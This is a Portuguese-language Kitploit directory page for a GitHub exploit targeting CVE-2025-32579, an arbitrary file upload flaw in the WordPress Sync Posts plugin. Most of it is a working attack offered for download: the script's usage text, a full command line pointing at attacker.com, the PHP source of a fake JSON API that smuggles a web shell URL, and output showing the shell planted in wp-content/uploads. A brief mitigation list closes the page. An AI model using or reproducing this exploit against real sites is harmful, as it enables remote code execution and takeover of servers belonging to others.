Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-32579 — O WordPress Sync Posts Plugin <= 1.0 é vulnerável a Upload Arbitrário de Arquivos. | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-32579
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubnxploited/cve-2025-32579

CVE-2025-32579

O WordPress Sync Posts Plugin <= 1.0 é vulnerável a Upload Arbitrário de Arquivos.

Ver Repositório
11há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

⚠️ CVE-2025-32579 - RCE Crítico via Plugin Sync Posts (WordPress)

📦 Afeta: Sync Posts <= 1.0
🧨 Pontuação CVSS: 9.9 CRÍTICA
📁 Vetor CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H


🧠 Visão Geral da Vulnerabilidade

O Sync Posts plugin WordPress da SoftClever Limited é vulnerável a uma vulnerabilidade de Upload de Arquivo sem Restrições que permite que atacantes autenticados enviem e executem arquivos PHP arbitrários (como web shells) no servidor.

🔓 Causa Raiz:

  • O plugin aceita um website_url que retorna posts JSON.
  • Ele baixa imagens cegamente dos conteúdos dos posts sem validação.
  • Nenhuma restrição de tipo de arquivo, mime-type ou caminho é aplicada.
  • Todas as imagens (até arquivos PHP) são baixadas e armazenadas dentro de wp-content/uploads.

🚨 Por que é Perigoso

  • ✅ Execução Remota de Código (RCE)
  • ✅ Envia web shells diretamente para o servidor
  • ✅ Requer privilégios mínimos (somente usuário autenticado)

⚙️ Descrição do Script (Exploit)

O script de exploit automatiza toda a cadeia:

  1. 📥 Faz login no WordPress usando as credenciais fornecidas
  2. 🧠 Gera uma API PHP falsa retornando um post JSON com um shell como <img src="https://raw.githubusercontent.com/nxploited/cve-2025-32579/HEAD/...">
  3. 📡 Envia um website_url malicioso para admin-ajax.php?action=sync_posts
  4. 💣 Força o plugin a buscar e salvar o shell em /uploads/
  5. ✅ Não precisa de Referer nem nonce — o cookie de sessão é suficiente

root@kitploit:~
usage: CVE-2025-32579.py [-h] -u URL -un USERNAME -p PASSWORD -ws WEBSITE -shell WEBSHELL

Exploit For CVE-2025-32579 Sync Posts # By: Nxploited ( Khaled Alenazi )

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://target.com/wordpress)
  -un, --username USERNAME
                        Username to login
  -p, --password PASSWORD
                        Password to login
  -ws, --website WEBSITE
                        URL to fake API (e.g., http://attacker.com/Khaled_alenazi.php)
  -shell, --webshell WEBSHELL
                        Web shell URL used inside the fake API (can be a test image)
                                                                                       

💻 Instruções de Uso

📌 Formato do Comando:

root@kitploit:~
python3 CVE-2025-32579.py -u http://target/wordpress -un admin -p pass123 -ws http://attacker.com/Khaled_alenazi.php -shell http://attacker.com/shell.php

⚙️ Argumentos:

FlagDescrição
-u, --urlURL do WordPress alvo
-un, --usernameNome de usuário do WordPress (admin)
-p, --passwordSenha do WordPress
-ws, --websiteURL do arquivo PHP malicioso que retorna JSON de post falso
-shell, --webshellO arquivo shell real a ser injetado via ``

Você também pode usar uma imagem dummy em vez de um shell real para testes:

root@kitploit:~
--webshell https://via.placeholder.com/1x1.jpg

🧪 Exemplo de Saída da API Falsa

Esta é a resposta retornada por Khaled_alenazi.php:

root@kitploit:~
<?php
header('Content-Type: application/json');
echo json_encode([
  [
    "id" => 1,
    "title" => ["rendered" => "Nxploited"],
    "content" => [
      "rendered" => "<img src="http://attacker.com/shell.php">"
    ]
  ]
]);
?>

✅ Exploit Bem-sucedido:

root@kitploit:~
[*] Attempting login...
[+] Logged in successfully.
[+] Generated fake API PHP file: Khaled_alenazi.php
[+] Sending exploit request to: http://target.com/wordpress
[+] Request sent successfully.
{
  "success": true,
  "data": {
    "message": "Posts imported successfully",
    ...
  }
}

🔥 Após a exploração bem-sucedida:

  • Caminho e Nome do Shell: shell.php
  • target.com/wp-content/uploads/2025/04/shell.php

🛠️ Correção / Mitigação

  • Restrinja o acesso a website_url a domínios internos ou hosts na lista de permissões
  • Valide extensões de imagem e tipos de conteúdo
  • Evite analisar JSON de terceiros sem sanitização

🧷 Referência

CVE: CVE-2025-32579
Exploit por Nxploited (Khaled Alenazi)


Baixar ferramenta